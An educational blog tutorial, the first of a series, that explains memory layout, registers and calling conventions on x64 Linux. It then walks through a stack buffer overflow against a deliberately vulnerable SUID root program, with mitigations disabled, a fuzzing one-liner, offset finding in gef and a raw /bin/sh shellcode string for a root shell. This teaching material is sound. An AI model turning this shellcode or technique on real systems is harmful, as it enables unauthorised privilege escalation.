Introduction to x64 Linux Binary Exploitation (Part 1)

12 min readJan 9, 2022

Basic Buffer Overflow (BoF)

This post is the first of a series of articles, where I will describe some basic x64 Linux Binary Exploitation techniques. Starting by disabling all the relative mitigation mechanisms like ASLR, DEP/NX, Stack Canaries e.t.c. we will start by creating a simple BoF and gradually enable all protections one by one in order to understand how they can be bypassed, but most importantly how they work.

As in all my previous posts, I will try to keep everything simple, though, in case you have any questions feel free to leave a comment and I’ll do my best to get an answer to you. Finally, I assume that you have some basic understanding of C, C++, Assembly and memory management as we have to have a starting point.

Before we start, you can use the links below to navigate to the rest of the other parts:

JMP to PART2 || PART3 || PART4 || PART5

Tools

We are going to perform most of our experiments on a Linux ubuntu system and we are going to use a compiler (I am using gcc), gef ( GEF — GDB Enhanced Features) and a hex editor. You can use the compiler and debugger that you prefer.

Basic concepts

What follows is a reference to some very basic concepts that will help you to understand these tutorials. If you already know what is a stack, a register, a buffer or how a function call is taking place you can JMP over the paragraphs bellow, or you can simply refresh your memory.

The application’s memory

As most of you probably know, when a program is executed the operating system creates a memory address space for it to run. This space is divided in to segments which, between else, include the program’s instructions and the data required for it to run. More specifically, a segment called .text contains the program instructions, while the .bss and .data contains the global variables. To be more precise bss contains declared but uninitialised global variables while the data contains the (global) initialised ones.

Besides the segments mentioned above, this memory space contains shared libraries (C, cap, dl e.t.c.), the heap and (finally) the stack. Whatever is dynamically allocated (e.g. variables using malloc or the new operator in C++ or Java) goes in the heap, while the stack is a LIFO (last in first out) data structure used for static memory allocation. In order to get a visual representation of the applications virtual memory you can take a look at the /proc/<process id>/maps file [1]:

In the picture above, the address field is the address space in the process that
the mapping occupies. The perms field is a set of permissions (read (r), write (w), execute (x), shared (s) and private (p). The offset field is the offset into the file, dev is the device (major:minor), inode is the inode on that device) and finally the pathname field will usually be the file that is backing the mapping.

The Registers

A processor register is a quickly accessible location available to a computer’s processor. If you are already familiar with the x86 (32 bit) architecture, you probably know that it uses, between else, eight General-Purpose registers, six Segment Registers, the EFLAG Register and the EIP register which points to the address where the next instruction that will be executed is saved.

The .x64 architecture extends x86’s 8 general-purpose registers to be 64-bit, and adds 8 new 64-bit registers. The 64-bit registers have names beginning with “r”, so for example the 64-bit extension of eax is called rax. The new registers are named r8 through r15:

The Buffer

A buffer is defined as a limited, contiguously allocated set of memory. The most common buffer in C is an array [3]. For languages like, C or C++ which don’t have any built-in mechanism to check the data size which is copied from one memory destination to another, there is a possibility that this data will exceed the buffer’s capacity and this is the case where serious problems occur.

“Sins of the father”
The C programming language has many “dangerous” functions that do not check bounds. These functions must be avoided, while in the unlikely event that they can’t, then the programmer must ensure that the bounds will never get exceeded. Some of these functions are the following:
strcpy, strcat, sprintf, vsprintf, gets
These should be replaced with functions such as strncpy, strncat, snprintf, and fgets respectively. The function strlen should be avoided unless you can ensure that there will be a terminating NIL character to find. The scanf family (scanf, fscanf, sscanf, vscanf, vsscanf, and vfscanf) is often dangerous to use [8].

Take a look in the example bellow:

In Line 13 we define an array with 3 elements while in Line 14 we are assigning a value to an unallocated memory address. The compiler doesn’t give any warning, but when the program is executed we get the following error:

*** stack smashing detected ***: terminated

If the programmer designs code that copies user input into a buffer, it may be possible for a user to intentionally place more input into a buffer than it can hold. This can have a number of different consequences, everything from crashing the program to forcing the program to execute user-supplied instructions.

Function Calls

When a function is called, the compiler uses, a stack frame (allocated within the program’s runtime stack) in order store all the temporary information that the function requires to operate. Depending on the calling convention the caller function will place the aforementioned information in specific registers or in the program stack or in both. For example for the C calling convention (cdecl) on a Linux operating system, up to six arguments will be placed to the RDI, RSI, RDX, RCX, R8 and R9 registers and anything additional will be placed in to the stack. Let’s see a simple example, in order to understand this. The myfunc bellow takes 8 parameters:

https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64

According to what we said before (assuming a C calling convention) when the function is called, its stack frame will be as follows:

As expected, the first six arguments are passed using the registers mentioned above, the last two h and g are “spilled” to the stack as well as the address to return after the function call, the RBP, the local variables and a mysterious red zone, which according to the formal definition from the AMD64 ABI, is defined as follows:

The 128-byte area beyond the location pointed to by %rsp is considered to be reserved and shall not be modified by signal or interrupt handlers. Therefore, functions may use this area for temporary data that is not needed across function calls. In particular, leaf functions may use this area for their entire stack frame, rather than adjusting the stack pointer in the prologue and epilogue. This area is known as the red zone.

There are many calling conventions (stdcall, fastcall, thiscall), each one of them defining a unique way on where the caller should place the parameters that the function called function requires [2], for our purpose though what is most important is the fact that besides the parameters the stack frame contains the return address where the execution control will continue after the called function exits.

Under specific conditions it is possible to override the return address and control the program execution.

Canonical Addresses

While 64-bit processors have 64-bit wide registers, systems generally do not implement all 64-bits for addressing. Thus most architectures define an unimplemented region of the address space which the processor will consider invalid for use. Intel and AMD documentation says that for 64 bit mode only 48 bits are actually available for virtual addresses, and bits from 48 to 63 must replicate bit 47 (sign-extension). Take a look in the memory mapping bellow to see how this concept applies:

The overwritten address has to be canonical or else the it will be considered as invalid and the redirection will fail.

For those familiar to x86 BoF exploitation, this means that an overwrite like 0x4141414141414141 (0x41 is the ascii value of “A”) will simply fail.

A vulnerable program

I’ll get straight to the point here… our vulnerable program has a SUID permission (Set owner User ID up on execution), it is owned by the root user and it is vulnerable to buffer overflow. When it comes to functionality, it doesn’t do much besides printing “Hi there <name>” where the name is given as a command line parameter:

Running something like: ./vuln Dimitrios will print: Hi there Dimitrios !! and thats all.

Disabling Canary, ASLR, NX, FORTIFY_SOURCE

Before we start the exploitation of this pease of code, we first have to compile it and we will use the following command for that:

$gcc -fno-stack-protector vuln.c -o vuln -z execstack -D_FORTIFY_SOURCE=0

In the command above, vuln.c is the c file where we wrote our code, vuln is the name of the final executable, the -fno-stack-protector will disable the canary protection, the -z execstack will disable the NX (No eXecute code from stack) protection and finally the D_FORTIFY_SOURCE=0 to disable buffer overflow error detection for functions that perform operations on memory and strings[7]. In order to disable ASLR run the following command:

$sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'

Finally use, chown and chmod to change the owner to root and set the SUID permission:

#chown root vuln; chmod +s vuln

Smashing the stack

Why this program is vulnerable ?

Because it “blindly” copies the user input to a buffer defined in function greet_me. By blindly I mean that it simply doesn’t perform any size checks, while since we use strcpy it is our responsibility (as developers) to make sure the the size of the destination string is large enough to store the copied string. Our buffer is 200 bytes long, thus let us see how the program behaves when we reach at this range of sizes. Some linux kung fu mixed with some python will do the trick:

$ for i in {200..210}; do echo using $i bytes; python -c “print(‘A’ * $i)” > payload; ./vuln $(cat payload) > /dev/null; done;

The one-liner above supplies a string of length $i (200 to 210) to our vulnerable program and since we don’t care about the actual output we send it to /dev/null (how convenient). The error output though will still be displayed in the standard output, thus after a few iterations we have the following output:

This means that 209 bytes (if we include the new line ‘\x0a’)were enough to overflow the name buffer and cause a segmentation fault. The payload that caused this error is the following:

Exploiting the vulnerability

Up to this point we identified that the program has a buffer overflow vulnerability. Our next step is to exploit this vulnerability and in order to do that we have to do the following:

Find the exact payload size: Remember from the “Function calls” paragraph that the stack frame of the vulnerable function should be similar to the one bellow. The “return address” comes after the EBP register:

So, we have to find the exact payload size that will overwrite the RBP register.

2. Inject some shellcode that “fits” to our needs (typically running a shell)

3. Redirect the code execution to the location where our shellcode is saved in the memory.

We will use the GDB Enhanced Features once again to perform these steps, so starting from (1), load the binary and add a breakpoint to our main function:

We are going to use gef’s pattern create in order to create a specially crafted input which will help us identify the exact size of input that overwrites RBP:

Save this pattern to our payload file and (use echo -n to omit the new line), and run the program (inside gdb) using the command:

gef> r $(cat payload)

Let gdb to hit our breakpoint and type “disas greet_me” to disassembly the greet_me function:

Set a new breakpoint on the “ret” instruction using the b *address command (in my case it will be gef> b *0x00005555555551d5) and let the execution continue by issuing the ‘c’ command.

When the execution will hit the second breakpoint you should see something like this:

The RBP register (highlighted in white) in the figure above, has been overwritten with the value “baaaaaab”. To find the exact offset of this value issue the pattern search baaaaaab command:

So, 208 + 8 bytes will be needed in order to overwrite RBP. The next step is to inject the shellcode and while you may write your own, for this tutorial you can simply find one online, or you can borrow the one bellow :

\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05

The shellcode above spawns a shell, which is the functionality that we need since we are dealing with a SUID program. Let us now write a simple python script which will “write down” what we have so far:

The nops mean simply “no operation” from the assembly’s point of view, so when the CPU encounters them it will simply do nothing. They will be used to “smoothly” transfer the execute to the next byte array, the shellcode. Please notice the following:

nops + shellcode + buf = 216 bytes
rip = 6 bytes (that going to overwrite the RIP register).

Run the program once again using gdb and when it hits the second breakpoint issue the following command (in order to examine the stack):

Our NOP sled is starting at 0x7fffffffde18
The stack pointer points to the CCCCC sequence:

The instruction pointer as well as our breakpoint is at 0x00005555555551d5

And what will happen in the next step is that the value where the stack pointer points to, will be popped out of the stack and pushed to the instruction pointer. Verify this by performing a single step:

$rip points to 0x434343434343 == CCCCCC address

What is left is to overwrite $rip with the right address which will be our nop sled (0x7fffffffde18) and in order to do that we will use the struct function of the struct python library. Our final exploit will look as bellow:

Achieving root privileges is just a command away:

Summary

In this part I demonstrated the exploitation of a simple buffer overflow vulnerability on a Linux x64 System which elevate my privileges to the root user. As mentioned in the beginning, all protections methods were disabled for the shake of the simplicity.

In the next Parts I will start enabling these protections and try to bypass them, in order to achieve similar to the above results.